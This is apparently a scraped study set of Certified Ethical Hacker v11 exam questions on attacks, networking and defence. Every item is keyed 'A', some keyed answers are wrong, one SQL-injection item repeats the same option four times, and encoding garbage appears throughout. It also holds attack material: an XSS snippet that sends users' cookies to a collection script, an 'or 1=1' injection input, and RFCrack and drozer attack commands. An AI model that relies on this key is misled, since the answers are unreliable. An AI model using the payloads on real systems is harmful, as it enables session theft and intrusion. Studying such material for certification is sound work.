CERTIFIED ETHICAL HACKER v11 MASTER SET

Réussis tes devoirs et examens dès maintenant avec Quizwiz!

A ________ attack involves overriding the portion of a target process's address space to control the execution of its process, to crash it completely, and to modify internal variables. A buffer overflow B broken access control C Cross-Site Scripting (XSS) D injection flaws

A

A ________ is a high-level document or set of documents that describes, in detail, the security controls to implement. It maintains confidentiality, availability, integrity, and asset values. A security policy B DRP C user agreement D COOP

A

A ________ works together to perform a full-scale test covering all aspects of the network, as well as physical and system intrusion. A tiger team B recovery team C red team D blue team

A

A company's policy requires employees to perform file transfers using protocols which encrypt traffic. You suspect some employees are still performing file transfers using unencrypted protocols because the employees do not like changes. You have positioned a network sniffer to capture traffic from the laptops used by employees in the data ingest department. Using Wireshark to examine the captured traffic, which command can be used as a display filter to find unencrypted file transfers? A. tcp.port = = 21 B. tcp.port = 23 C. tcp.port = = 21 | | tcp.port = =22 D. tcp.port ! = 21

A

A computer ________ is a program in which the malicious or harmful code is contained inside apparently harmless programming or data in such a way that it can get control and cause damage. A Trojan B password C spiking D program

A

A detailed footprint provides maximum information about the target organization and can help identify vulnerabilities in the target organization's security perimeter. A True B False

A

A disadvantage of a hybrid cloud environment is that data compliance is easy to achieve. A False B True

A

A large mobile telephony and data network operator has a data center that houses network elements. These are essentially large computers running on Linux. The perimeter of the data center is secured with firewalls and IPS systems. What is the best security policy concerning this setup? A. Network elements must be hardened with user ids and strong passwords. Regular security tests and audits should be performed. B. As long as the physical access to the network elements is restricted, there is no need for additional measures. C. There is no need for specific security measures on the network elements as long as firewalls and IPS systems exist. D. The operator knows that attacks and down time are inevitable and should have a backup site.

A

A network administrator discovers several unknown files in the root directory of his Linux FTP server. One of the files is a tarball, two are shell script files, and the third is a binary file is named ג€nc.ג€ The FTP serverג€™s access logs show that the anonymous user account logged in to the server, uploaded the files, and extracted the contents of the tarball and ran the script using a function provided by the FTP serverג€™s software. The ps command shows that the nc file is running as process, and the netstat command shows the nc process is listening on a network port. What kind of vulnerability must be present to make this remote attack possible? A. File system permissions B. Privilege escalation C. Directory traversal D. Brute force login

A

A network assessment focuses on transactional web applications, traditional client-server applications, and hybrid systems. A False B True

A

A network diagram does NOT help with analyzing network topologies. A False B True

A

A new wireless client is configured to join a 802.11 network. This client uses the same hardware and software as many of the other clients on the network. The client can see the network, but cannot connect. A wireless packet sniffer shows that the Wireless Access Point (WAP) is not responding to the association requests being sent by the wireless client. What is a possible source of this problem? A. The WAP does not recognize the clientג€™s MAC address B. The client cannot see the SSID of the wireless network C. Client is configured for the wrong channel D. The wireless client is not configured to use DHCP

A

A poorly configured webserver is protected by the organization's firewall system. A False B True

A

A regional bank hires your company to perform a security assessment on their network after a recent data breach. The attacker was able to steal financial data from the bank by compromising only a single server. Based on this information, what should be one of your key recommendations to the bank? A. Place a front-end web server in a demilitarized zone that only handles external web traffic B. Require all employees to change their anti-virus program with a new one C. Move the financial data to another server on the same IP subnet D. Issue new certificates to the web servers from the root certificate authority

A

A rootkit is a type of malware that can be easily found using an antivirus application installed on the computer. A False B True

A

A single security mechanism can be used to protect someone from social-engineering techniques. A False B True

A

A single vulnerability in web server configuration may lead to a security breach on websites. A True B False

A

A(n) __________________ is an attack type for a rogue Wi-Fi access point that appears to be a legitimate one offered on the premises, but actually has been set up to eavesdrop on wireless communications. It is the wireless version of the phishing scam. An attacker fools wireless users into connecting a laptop or mobile phone to a tainted hotspot by posing as a legitimate provider. This type of attack may be used to steal the passwords of unsuspecting users by either snooping the communication link or by phishing, which involves setting up a fraudulent web site and luring people there. A. Evil Twin Attack B. Sinkhole Attack C. Collision Attack D. Signal Jamming Attack

A

A/An ________ is an application that can serve as an INTERMEDIARY for connecting with other computers. A proxy server B application server C call manager D security server

A

Administrators often overlook the ________ in terms of security. However, if queried properly, it can provide valuable network information to the attackers. A NTP server B cache file C virtual database D Active Directory

A

All hacking is done with malicious intent. A False B True

A

An Intrusion Detection System (IDS) has alerted the network administrator to a possibly malicious sequence of packets sent to a Web server in the network's external DMZ. The packet traffic was captured by the IDS and saved to a PCAP file. What type of network tool can be used to determine if these packets are genuinely malicious or simply a false positive? A. Protocol analyzer B. Network sniffer C. Intrusion Prevention System (IPS) D. Vulnerability scanner

A

An attacker attaches a rogue router in a network. He wants to redirect traffic to a LAN attached to his router as part of a man-in-the-middle attack. What measure on behalf of the legitimate admin can mitigate this attack? A. Make sure that legitimate network routers are configured to run routing protocols with authentication. B. Disable all routing protocols and only use static routes C. Only using OSPFv3 will mitigate this risk. D. Redirection of the traffic cannot happen unless the admin allows it explicitly.

A

An attacker can easily compromise a wireless network if proper security measures are NOT applied or if there is no appropriate network configuration. A True B False

A

An attacker can use many attack techniques to compromise a webserver. A True B False

A

An attacker with access to the inside network of a small company launches a successful STP manipulation attack. What will he do next? A. He will create a SPAN entry on the spoofed root bridge and redirect traffic to his computer. B. He will activate OSPF on the spoofed root bridge. C. He will repeat this action so that it escalates to a DoS attack. D. He will repeat the same attack against all L2 switches of the network.

A

An attacker's job becomes more difficult if he/she captures the session IDs that contain the actual logon information in the string. A False B True

A

An ethical hacker does NOT need to know the penalties of unauthorized hacking activities associated with a network penetration test because the ethical hacker has permission to hack the network. A False B True

A

An incident investigator asks to receive a copy of the event logs from all firewalls, proxy servers, and Intrusion Detection Systems (IDS) on the network of an organization that has experienced a possible breach of security. When the investigator attempts to correlate the information in all of the logs, the sequence of many of the logged events do not match up. What is the most likely cause? A. The network devices are not all synchronized. B. Proper chain of custody was not observed while collecting the logs. C. The attacker altered or erased events from the logs. D. The security breach was a false positive.

A

An insider attack involves using privileged access to intentionally violate rules or cause a threat to the organization's information or information systems in any form. A True B False

A

Any unsolicited message sent in bulk from known/unknown phone number / email IDs that targets a mobile phone is known as all of the following EXCEPT: A Solicited spam B M-spam C Text spam D SMS spam

A

App stores are a common target for attackers to distribute malware and malicious apps. A True B False

A

Attacker Rony installed a rogue access point within an organization's perimeter and attempted to intrude into its internal network. Johnson, a security auditor, identified some unusual traffic in the internal network that is aimed at cracking the authentication mechanism. He immediately turned off the targeted network and tested for any weak and outdated security mechanisms that are open to attack. What is the type of vulnerability assessment performed by Johnson in the above scenario? A. Wireless network assessment B. Application assessment C. Host-based assessment D. Distributed assessment

A

Attackers circumvent IDSs by implementing techniques such as: A Packet fragmentation B UDP port scans C NAT translation D TCP scans

A

Attackers hack a web server in multiple stages. A True B False

A

Attackers implement various techniques such as stealing, guessing, and brute-forcing to get a valid session ID to take hold of a valid user's session while that session is still in progress. A True B False

A

Attackers perform vulnerability analysis to identify security loopholes in the target organization's policies and procedures. A False B True

A

Attackers use ________ to infect a large number of computers, which form a network, or "________," allowing them to launch DDoS attacks, generate spam, spread viruses, and commit other types of crime. A bots / botnet B Trojan horses / virus C wires / code D programs / file

A

Attackers use information collected through ________ to identify vulnerabilities or weak points in system security. A enumeration B networking C footprinting D forensics

A

Banner grabbing, or "OS fingerprinting," is a method used to determine the operating system that is running on a remote target system. A True B False

A

Because attackers break into systems for various reasons, it is important for information security professionals to understand how malicious hackers exploit systems and the probable reasons behind the attacks. A True B False

A

Bella, a security professional working at an IT firm, finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames, and passwords are shared in plaintext, paving the way for hackers to perform successful session hijacking. To address this situation, Bella implemented a protocol that sends data using encryption and digital certificates. Which of the following protocols is used by Bella? A. FTPS B. FTP C. HTTPS D. IP

A

Bluesnarfing involves gaining remote access to a target Bluetooth-enabled device and using its features without a victim's knowledge or consent. A False B True

A

Bob received this text message on his mobile phone: "Hello, this is Scott Smelby from the Yahoo Bank. Kindly contact me for a vital transaction on: [email protected]". Which statement below is true? A. This is a scam as everybody can get a @yahoo address, not the Yahoo customer service employees. B. This is a scam because Bob does not know Scott. C. Bob should write to [email protected] to verify the identity of Scott. D. This is probably a legitimate message as it comes from a respectable organization.

A

Bob, an attacker, has managed to access a target IoT device. He employed an online tool to gather information related to the model of the IoT device and the certifications granted to it. Which of the following tools did Bob employ to gather the above information? A. FCC ID search B. Google image search C. search.com D. EarthExplorer

A

Bobby, an attacker, targeted a user and decided to hijack and intercept all their wireless communications. He installed a fake communication tower between two authentic endpoints to mislead the victim. Bobby used this virtual tower to interrupt the data transmission between the user and real tower, attempting to hijack an active session. Upon receiving the user's request, Bobby manipulated the traffic with the virtual tower and redirected the victim to a malicious website. What is the attack performed by Bobby in the above scenario? A. aLTEr attack B. Jamming signal attack C. Wardriving D. KRACK attack

A

By executing malicious applications, the attacker can steal personal information, gain unauthorized access to system resources, crack passwords, capture screenshots, install a backdoor for maintaining easy access, and so on. A True B False

A

By performing a penetration test, you gained access under a user account. During the test, you established a connection with your own machine via the SMB service and occasionally entered your login and password in plaintext. Which file do you have to clean to clear the password? A. .xsession-log B. .profile C. .bashrc D. .bash_history

A

Cloud computing services are broadly divided into ________ categories. A three B two C four D one

A

Common targets of social engineering in an organization include all of the following EXCEPT: A Potential employees B System administrators C Receptionists and helpdesk personnel D Technical support executives

A

David is a security professional working in an organization, and he is implementing a vulnerability management program in the organization to evaluate and control the risks and vulnerabilities in its IT infrastructure. He is currently executing the process of applying fixes on vulnerable systems to reduce the impact and severity of vulnerabilities. Which phase of the vulnerability-management life cycle is David currently in? A. Remediation B. Verification C. Risk assessment D. Vulnerability scan

A

Defensive Information Warfare refers to all strategies and actions to defend against attacks on ICT assets. A True B False

A

Disadvantages of Infrastructure-as-a-Service (IaaS) include: A Software security risk B Guaranteed uptime C Vendor lock-in D Policy-based services

A

DoS/DDoS is NOT a major security threat on the internet. A False B True

A

EISA ensures that the security architecture and controls are in alignment with the organization's core goals and strategic direction. A True B False

A

Each category of information warfare consists of both offensive and defensive strategies. A True B False

A

Educating employees on how to recognize and respond to social-engineering attacks is the best way to help minimize the chances of social-engineering attacks being successful. A True B False

A

Effective management of information security is NOT an ongoing process; updates should be made periodically. A False B True

A

Ethical hackers perform hacking with the permission of the network or system owner and without the intention to cause harm. A True B False

A

Ethical hacking is NOT necessary because organizations can counter attacks from malicious hackers through other means that assist in anticipating methods used by them to break into a system. A False B True

A

Examples of a social-engineering attack are ping attacks, network scanning, and impersonation. A False B True

A

Finding open ports is an attacker's last step toward access to the target system. A False B True

A

Footprinting performed on target organizations does NOT give the complete profile of the organization's security posture. A False B True

A

Garry is a network administrator in an organization. He uses SNMP to manage networked devices from a remote location. To manage nodes in the network, he uses MIB, which contains formal descriptions of all network objects managed by SNMP. He accesses the contents of MIB by using a web browser either by entering the IP address and Lseries.mib or by entering the DNS library name and Lseries.mib. He is currently retrieving information from an MIB that contains object types for workstations and server services. Which of the following types of MIB is accessed by Garry in the above scenario? A. LNMIB2.MIB B. DHCP.MIB C. MIB_II.MIB D. WINS.MIB

A

Gilbert, a web developer, uses a centralized web API to reduce complexity and increase the integrity of updating and changing data. For this purpose, he uses a web service that uses HTTP methods such as PUT, POST, GET, and DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application. What is the type of web-service API mentioned in the above scenario? A. RESTful API B. JSON-RPC C. SOAP API D. REST API

A

Harry, a professional hacker, targets the IT infrastructure of an organization. After preparing for the attack, he attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Using these techniques, he successfully deployed malware on the target system to establish an outbound connection. What is the APT lifecycle phase that Harry is currently executing? A. Initial intrusion B. Persistence C. Cleanup D. Preparation

A

Henry is a cyber security specialist hired by BlackEye - Cyber Security Solutions. He was tasked with discovering the operating system (OS) of a host. He used the Unicornscan tool to discover the OS of the target system. As a result, he obtained a TTL value, which indicates that the target system is running a WindowsOS. Identify the TTL value Henry obtained, which indicates that the target OS is Windows. A. 128 B. 255 C. 64 D. 138

A

How many ways are there to obfuscate a malicious SQL query in order to avoid detection by the IDS? A Two B Four C Three D One

A

ICMP echo scanning pings all the machines in the target network to discover live machines. A True B False

A

Identify the Oracle database objects used by attackers for enumeration. A Sys.user_objects, sys.user_views, sys.all_tables B mysql.user, mysql.db, mysql.tables_priv C sysobjects, syscolumns, sysdatabases D MsysObjects, MsysQueries, MsysRelationships

A

Identify the SQL injection attack, in which an attacker uses a conditional OR clause such that the condition of the WHERE clause will always be true. A Tautology-based SQL injection B UNION SQL Injection C Error-based SQL Injection D Piggybacked SQL injection

A

Identify the social engineering technique in which the attacker targets a person inside the company online, pretending to be an attractive person and then begins a fake online relationship to obtain confidential information about the target company? A Honey Trap B Eavesdropping C Diversion Theft D Piggybacking

A

Identity theft occurs when attackers illegally obtain personally identifying information (such as a name, address, phone number, bank account number, credit card information, driving license number, or passport number) and use it to commit fraud or other criminal acts. A True B False

A

In ________ social engineering, a perpetrator assumes the role of a person in authority and has employees asking him/her for information. A reverse B human-based C computer-based D personal

A

In a network there are generally two main causes for systems being vulnerable: software or hardware ________ and poor ________ practices. A misconfiguration / programming B social engineering / hiring C spoofing / management D development / policy

A

In an internal security audit, the white hat hacker gains control over a user account and attempts to acquire access to another account's confidential files and information. How can he achieve this? A. Privilege Escalation B. Shoulder-Surfing C. Hacking Active Directory D. Port Scanning

A

In black-box testing, the pen tester needs to have significant knowledge about the network or the system to be tested. A False B True

A

In one of the following IoT attacks, attackers intercept legitimate messages from a valid communication and continuously send the intercepted message to the target device to perform a denial-of-service attack or crash the target device. Which is this IoT attack? A Replay attack B Exploit kits C Network pivoting D BlueBorne attack

A

In the enumeration phase, attackers create active connections to the target system and perform directed queries to gain more information about the target. A True B False

A

In which of the following attacks can an attacker eavesdrop on loudspeaker voice conversations between remote mobile users by exploiting the hardware-based motion sensor, i.e., the accelerometer? A Spearphone Attack B Agent Smith Attack C SMiShing Attack D Simjacker Attack

A

In which of the following attacks does the attacker load the target website inside a low opacity iframe? A Clickjacking Attack B RC4 NOMORE Attack C MarioNet Attack D JavaScript Hijacking

A

In which of the following footprinting threats do competitors launch similar products in the market, alter prices, and undermine the market position of a target organization? A Corporate Espionage B Network Attack C Information Leakage D Social Engineering

A

In which of the following is the source code of the application analyzed during the execution of the code? A Dynamic code analysis B Static code analysis C Fuzzing code analysis D Vulnerability code analysis

A

In which of the following layers of the OSI model does the stateful inspection firewall filter the packets? A Network layer B Physical layer C Transport layer D Data link layer

A

In which the following attacks does the attacker send partial HTTP requests to the target web server or application, and as a result, the target server's maximum concurrent connection pool will be exhausted? A Slowloris Attack B Fragmentation Attack C HTTP GET/POST Attack D Spoofed Session Flood Attack

A

In which type of attack does an attacker overload a system's resources, significantly slowing or bringing systems down? A Denial-of-Service attack B Internet address attack C Online attack D MAC address attack

A

In which type of client-side attack does the attacker compromise the session token by making use of malicious code or programs? A Cross-site script B Application layer C Peer-to-peer D TCP Stat-exhaustion

A

Incident management only involves responding to incidents. A False B True

A

Individuals and organizations use digital signatures to ensure non-repudiation. A True B False

A

Information is NOT the critical asset that organizations need to secure. A False B True

A

Information security controls prevent unwanted events from occurring and reduce risk to the organization's information assets. A True B False

A

Insufficient security training makes companies vulnerable to social-engineering attacks. A True B False

A

It is NOT possible to find ways to intrude into a target organization's network using footprinting. A False B True

A

It is difficult to launch an insider attack, and prevention of such attacks is easy. A False B True

A

It is easy to detect passive sniffers, especially when they are running on a shared Ethernet. A False B True

A

It is very easy to detect social-engineering attempts. False True

A

Jim's company regularly performs backups of their critical servers. But the company cannot afford to send backup tapes to an off-site vendor for long-term storage and archiving. Instead, Jim's company keeps the backup tapes in a safe in the office. Jim's company is audited each year, and the results from this year's audit show a risk because backup tapes are NOT stored off-site. The Manager of Information Technology has a plan to take the backup tapes home with him and wants to know what two things he can do to secure the backup tapes while in transit? A. Encrypt the backup tapes and transport them in a lock box. B. Degauss the backup tapes and transport them in a lock box. C. Hash the backup tapes and transport them in a lock box. D. Encrypt the backup tapes and use a courier to transport them.

A

John the Ripper is a technical assessment tool used to test the weakness of which of the following? A. Passwords B. File permissions C. Firewall rulesets D. Usernames

A

Judy created a forum. One day, she discovers that a user is posting strange images without writing comments. She immediately calls a security expert, who discovers that the following code is hidden behind those images: script document.write("<img.src="https://localhost/submitcookie.php? cookie ='+ escape(document.cookie) +"' />);/script What issue occurred for the users who clicked on the image? A. This php file silently executes the code and grabs the user's session cookie and session ID. B. The code redirects the user to another site. C. The code injects a new cookie to the browser. D. The code is a virus that is attempting to gather the user's username and password.

A

Lack of security policies is a factor that makes companies vulnerable to social-engineering attacks. A True B False

A

Linguistic steganography hides a message using scientific methods. A False B True

A

Linguistic steganography hides the message in a carrier—the specific medium used to communicate or transfer messages or files. A True B False

A

MDM's importance is increasing due to the increase in the types of mobile devices being utilized and the need for policy to regulate mobile device utilization. A True B False

A

Malware can damage a computer but it cannot actually slow computers or steal personal information. A False B True

A

Malware is ________ that damages or disables computer systems and gives limited or full control of the systems to its creator for the purpose of theft or fraud. A malicious software B system hacking C spam D internet software

A

Mobile security is becoming easier to implement because technology assists in rapid development of security mechanisms for new mobile devices. A False B True

A

Most cases of insider abuse can be traced to individuals who are introverted, incapable of dealing with stress, experiencing conflicts with management, frustrated with their job or office politics, lacking in respect or promotion, transferred, demoted, or were issued an employment-termination notice. A True B False

A

Most large information-security attacks today involve ________. Attackers use these to infect a large number of computers throughout a large geographical area to create a network of bots that they can control via a command-and-control center. A botnets B robot testing files C defacement Trojans D eviscerating Trojans

A

Mr. Omkar performed tool-based vulnerability assessment and found two vulnerabilities. During analysis, he found that these issues are NOT true vulnerabilities. What will you call these issues? A. False positives B. True negatives C. True positives D. False negatives

A

NTFS is the forensic system used to analyze hard drives. A False B True

A

Network segmentation divides a network into different segments. A True B False

A

Offensive Information Warfare refers to warfare against the assets of an opponent. A True B False

A

Once victims download free programs and label them TRUSTED, they are safe. A False B True

A

One can complete the three-way handshake and open a successful TCP connection with spoofed IP addresses. A False B True

A

Passive assessments are a type of vulnerability assessment that uses network scanners to scan the network to identify the hosts, services, and vulnerabilities present in that network. A False B True

A

Prior to performing a social-engineering attack, an attacker gathers information about the target organization from: A Various sources B network diagram C Back-up logs D penetration test

A

Ralph, a professional hacker, targeted Jane, who had recently bought new systems for her company. After a few days, Ralph contacted Jane while masquerading as a legitimate customer support executive, informing that her systems need to be serviced for proper functioning and that customer support will send a computer technician. Jane promptly replied positively. Ralph entered Jane's company using this opportunity and gathered sensitive information by scanning terminals for passwords, searching for important documents in desks, and rummaging bins. What is the type of attack technique Ralph used on Jane? A. Impersonation B. Dumpster diving C. Shoulder surfing D. Eavesdropping

A

Rootkits are malware that help the attackers to gain unauthorized access to a remote system and perform malicious activities. A True B False

A

SMS phishing is effective because mobile users are NOT conditioned to receiving spam text messages on their mobile devices. A True B False

A

SMTP uses ________ to direct the mail via DNS. It runs on TCP port 25. A Mail Exchange (MX) servers B cache files C virtual databases D NTP servers

A

SNMP uses three types of software components for communication. A False B True

A

Samuel, a professional hacker, monitored and intercepted already established traffic between Bob and a host machine to predict Bob's ISN. Using this ISN, Samuel sent spoofed packets with Bob's IP address to the host machine. The host machine responded with a packet having an incremented ISN. Consequently, Bob's connection got hung, and Samuel was able to communicate with the host machine on behalf of Bob. What is the type of attack performed by Samuel in the above scenario? A. TCP/IP hijacking B. Blind hijacking C. UDP hijacking D. Forbidden attack

A

Scanning is the process of gathering information about systems that are "alive" and responding on the network. A True B False

A

Scanning techniques are split into ________ categories. A three B five C four D two

A

Script Kiddies are skilled hackers who compromise systems by running scripts, tools, and software developed by real hackers. A False B True

A

Security administrator John Smith has noticed abnormal amounts of traffic coming from local computers at night. Upon reviewing, he finds that user data have been exfiltrated by an attacker. AV tools are unable to find any malicious software, and the IDS/IPS has not reported on any non-whitelisted programs. What type of malware did the attacker use to bypass the company's application whitelisting? A. File-less malware B. Zero-day malware C. Phishing malware D. Logic bomb malware

A

Security experts categorize computer crimes into ________ categories. A two B three C five D four

A

Session IDs with a(n) ________ allow an attacker with unlimited time to guess a valid session ID. A indefinite expiration time B sufficient network C lot of bandwidth D search engine use

A

Smartphones are treasure troves for attackers to steal data because they are used for corporate and personal use. A True B False

A

Social engineering deals with network security issues. A False B True

A

Social engineering is effective because people usually believe and trust others and derive fulfillment from helping others in need. A True B False

A

Social engineering is the art of convincing people to reveal ________ to perform some kind of ________. A sensitive information / malicious action B basic information / civic action C passwords / break-in D personal information / breach

A

Social-engineering attacks are easy to guard against because the victim is aware that he/she has been deceived. A False B True

A

Social-engineering attacks can cost an organization all of the following EXCEPT: A Minimized user awareness B Loss of privacy C Lawsuits and arbitration D Temporary or permanent closure

A

Some techniques involved in reverse social engineering include sabotage, marketing, and support. A True B False

A

Source-code review is intended to detect and fix security mistakes made by the programmers during the development phase. It is a type of white-box testing usually carried out during the implementation phase of the Security Development Lifecycle (SDL). ATrue B False

A

State-sponsored hackers are government agents who are tasked with trying to penetrate and gain top-secret information—and to damage information systems of other governments. A True B False

A

Steganalysis is basically the same process of steganography. A False B True

A

Structured Query Language is used by webservers. A False B True

A

Suicide hackers are similar to suicide bombers, who sacrifice their life for an attack and are thus not concerned with the consequences of their actions. A True B False

A

Suppose that you test an application for the SQL injection vulnerability. You know that the backend database is based on Microsoft SQL Server. In the login/ password form, you enter the following credentials: Username: attack or 1=1 Password: 123456 - Based on the above credentials, which of the following SQL commands are you expecting to be executed by the server, if there is indeed an SQL injection vulnerability? A. select * from Users where UserName = attack or 1=1 and UserPassword = 123456 B. select * from Users where UserName = attack or 1=1 and UserPassword = 123456 C. select * from Users where UserName = attack or 1=1 and UserPassword = 123456 D. select * from Users where UserName = attack or 1=1 and UserPassword = 123456

A

TCP Connect/Full Open Scan is one of the most unreliable forms of TCP scanning. A False B True

A

TCP connection between protocols is possible through the process of the ________. A Three-way handshake B Stateful connections C IP session D TCP session

A

The Internet of Things architecture includes a single layer consisting of the Application Edge Technology Layer. A False B True

A

The SSDP service controls communication for the Universal Plug and Play feature (uPnP). A True B False

A

The UDP protocol can be easier to use than TCP scanning because you can send a packet, and NOT worry about whether the host is alive, dead, or filtered. A False B True

A

The adoption of internet use throughout the business world has decreased network usage. A False B True

A

The basic security concepts critical to information on the internet are authentication, authorization, and non-repudiation; those related to the persons accessing information are confidentiality, integrity, and availability. A False B True

A

The collection of potentially actionable, overt, and publicly available information is known as ________________. A. Open-source intelligence B. Real intelligence C. Social intelligence D. Human intelligence

A

The company ABC recently contracts a new accountant. The accountant will be working with the financial statements. Those financial statements need to be approved by the CFO and then they will be sent to the accountant but the CFO is worried because he wants to be sure that the information sent to the accountant was not modified once he approved it. Which of the following options can be useful to ensure the integrity of the data? A. The CFO can use a hash algorithm in the document once he approved the financial statements B. The CFO can use an excel file with a password C. The financial statements can be sent twice, one by email and the other delivered in USB and the accountant can compare both to be sure is the same document D. The document can be sent to the accountant using an exclusive USB for that document

A

The components of IoT technology that play an essential role in the working of an IoT device are sensing technology, gateways, data storage, and remote control. A True B False

A

The goal of the rootkit is to gain root privileges to a system. A True B False

A

The greatest tool of a social engineer is: A Human nature B The ability to fit in C The ability to obtain information D Ingenuity

A

The impact of DDoS includes which of the following? A Loss of goodwill, disabled network, financial loss, and disabled organizations B Flood of incoming messages, family issues C Distributed Denial-of-Service D Technology loss, additional emails

A

The last step in penetration testing IoT devices is to document all the findings. A True B False

A

The least common targets for viruses are the system sectors. A False B True

A

The most common human-based social engineering technique is ________, where an attacker pretends to be someone legitimate or an authorized person. A impersonation B charlatan C phishing D Messenger

A

The most common way of networking computers is through an Ethernet. A True B False

A

The network diagram helps to trace out the path to the target host in the network, but does not enable the attacker to understand the position of firewalls, IDSs, routers, and other access control devices. A False B True

A

The possible methods of extracting information from another human rely on the attacker's ingenuity. A True B False

A

The process of creating a list of the user's accounts and devices on a target computer using SNMP is ________. A SNMP enumeration B corporate espionage C network attacks D footprinting

A

The term information warfare or InfoWar refers to the use of information and communication technologies (ICT) for competitive advantages over an opponent. A True B False

A

The threat model consists of ________ major building block(s). A three B one C two D four

A

There are four types of vulnerability assessment solutions: -product-based solutions -service-based solutions -tree-based assessment -inference-based assessment. True False

A

There are no countermeasures for SNMP enumeration. A False B True

A

To guard against social-engineering attacks, organizations must develop and implement good policies and procedures. A True B False

A

To reach a bank web site, the traffic from workstations must pass through a firewall. You have been asked to review the firewall configuration to ensure that workstations in network 10.10.10.0/24 can only reach the bank web site 10.20.20.1 using https. Which of the following firewall rules meets this requirement? A. if (source matches 10.10.10.0/24 and destination matches 10.20.20.1 and port matches 443) then permit B. if (source matches 10.10.10.0/24 and destination matches 10.20.20.1 and port matches 80 or 443) then permit C. if (source matches 10.20.20.1 and destination matches 10.10.10.0/24 and port matches 443) then permit D. if (source matches 10.10.10.0 and destination matches 10.20.20.1 and port matches 443) then permit

A

Today's information security management programs are primarily concerned with firewalls and passwords. A False B True

A

Using information procured through search engines helps an attacker in performing social engineering and other types of advanced system attacks. A True B False

A

Vendors occasionally deliver hotfixes as a set of fixes called a combined hotfix or service pack. A True B False

A

Vulnerabilities are classified based on severity level (low, medium, or high), and the exploit range needs to keep up with the most recently discovered vulnerabilities and exploits. A True B False

A

Vulnerability ________ is an important tool for information security management as it identifies all the security weaknesses before an attacker can exploit them. A assessment B scoring C reporting D research

A

Vulnerability ________ systems are used by security analysts to rank information system vulnerabilities and to provide a composite score of the overall severity and risk associated with identified vulnerabilities. A scoring B reporting C research D assessment

A

Vulnerability assessment reports are classified into two types: security vulnerability report and security vulnerability summary. A True B False

A

WITHOUT using intrusion methods, hackers directly and indirectly collecting information through persuasion and various other means is called ________. A social engineering B system and network attacks C privacy loss D information leakage

A

Web application threats are limited to attacks based on a URL and port 80. A False B True

A

Web applications allow the user to perform specific tasks such as searching, sending email, connecting with friends, online shopping, and tracking and tracing. A True B False

A

Web applications are NOT vulnerable to threats and attackers. A False B True

A

Web applications are ________ that run on web browsers and act as the interface between users and web servers through webpages. A software programs B service controls C MAC address codes D hardware designs

A

Webserver security is critical to the normal functioning of an organization. A True B False

A

What are some of the tools that an attacker can use for sniffing traffic generated by IoT devices? A Z-Wave and Wireshark B beSTORM and Metasploit C KillerBee and ChipWhisperer D Shodan and Censys

A

What does a firewall check to prevent particular ports and applications from getting packets into an organization? A. Transport layer port numbers and application layer headers B. Presentation layer headers and the session layer port numbers C. Network layer headers and the session layer port numbers D. Application layer port numbers and the transport layer headers

A

What is correct about digital signatures? A. A digital signature cannot be moved from one signed document to another because it is the hash of the original document encrypted with the private key of the signing party. B. Digital signatures may be used in different documents of the same type. C. A digital signature cannot be moved from one signed document to another because it is a plain hash of the document content. D. Digital signatures are issued once for each user and can be used everywhere until they expire.

A

What is the file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) in an Android application? A. AndroidManifest.xml B. classes.dex C. APK.info D. resources.asrc

A

What is the first step for a hacker conducting a DNS cache poisoning (DNS spoofing) attack against an organization? A. The attacker queries a nameserver using the DNS resolver. B. The attacker uses TCP to poison the DNS resolver. C. The attacker makes a request to the DNS resolver. D. The attacker forges a reply from the DNS resolver.

A

What term describes the amount of risk that remains after the vulnerabilities are classified and the countermeasures have been deployed? A. Residual risk B. Impact risk C. Deferred risk D. Inherent risk

A

When a legitimate app is repackaged, a malicious developer downloads a legitimate game, repackages it with malware, and uploads the game to the third-party application store—from which end users download the malicious application, believing it to be a genuine one. A True B False

A

When compared to wired networks, wireless networks are expensive and difficult to maintain. A False B True

A

When you are getting information about a web server, it is very important to know the HTTP Methods (GET, POST, HEAD, PUT, DELETE, TRACE) that are available because there are two critical methods (PUT and DELETE). PUT can upload a file to the server and DELETE can delete a file from the server. You can detect all these methods (GET, POST, HEAD, PUT, DELETE, TRACE) using NMAP script engine. What Nmap script will help you with this task? A. http-methods B. http enum C. http-headers D. http-git

A

Which attack type leverages a Ticket Granting Ticket? A AS-REP Roasting B Kerberoasting C PRINCE Attack D Combinator Attack

A

Which concept was originally established to identify, prepare to attack, engage, and destroy the target? A Cyber Kill Chain Methodology B Adversary Behavioral Identification C Indicators of Compromise (IOCs) D Tactics, Techniques, and Procedures (TTPs)

A

Which hash function is an iterated hash function producing a 256-bit hash value? A GOST B MD6 C YAK D MD5

A

Which mode of IPSec should you use to assure security and confidentiality of data within the same LAN? A. ESP transport mode B. ESP confidential C. AH permiscuous D. AH Tunnel mode

A

Which of the following Linux commands will resolve a domain name into IP address? A. >host-t a hackeddomain.com B. >host-t ns hackeddomain.com C. >host -t soa hackeddomain.com D. >host -t AXFR hackeddomain.com

A

Which of the following RFCrack commands is used by an attacker to perform an incremental scan on a target IoT device while launching a rolling-code attack? A python RFCrack.py -b -v 5000000 B python RFCrack.py -j -F 314000000 C python RFCrack.py -r -M MOD_2FSK -F 314350000 D python RFCrack.py -i

A

Which of the following are algorithms (a series of well-defined steps) for performing encryption and decryption? A Ciphers B System integrity verifier C Government Access to Keys (GAK) D Symmetric encryption

A

Which of the following attack is defined as a type of network attack where an attacker gains unauthorized access to a target network and remains undetected for a long period of time? A Advanced Persistent Threat B Cloud Computing Threat C Insider Threat D Mobile Threat

A

Which of the following attacks occur when attackers tamper with hardware or software prior to installation? A Distribution Attacks B Close-in Attacks C Passive Attacks D Insider Attacks

A

Which of the following cloud services provides data processing services, such as IoT services for connected devices, mobile and web applications, and batch-and-stream processing? A Function as a service (FaaS) B Container as a service (CaaS) C Security as a service (SECaaS) D Identity as a service (IDaaS)

A

Which of the following components of an IoT framework must incorporate strong encryption techniques for secure communications between endpoints and the authentication mechanism for the edge components? A Gateway B Cloud platform C Mobile D Edge

A

Which of the following controls reduces attacks on the cloud system? A Deterrent B Detective C Preventive D Corrective

A

Which of the following drozer commands is used by an attacker to find the list of various exported activities, services, broadcast receivers, and content providers in a target mobile device? A dz> run app.package.attacksurface <package_name> B dz> run app.activity.start --component <package_name> <activity_name> C dz> run app.package.list D dz> run app.package.info -a <package_name>

A

Which of the following incident handling process phases is responsible for defining rules, collaborating human workforce, creating a back-up plan, and testing the plans for an organization? A. Preparation phase B. Containment phase C. Identification phase D. Recovery phase

A

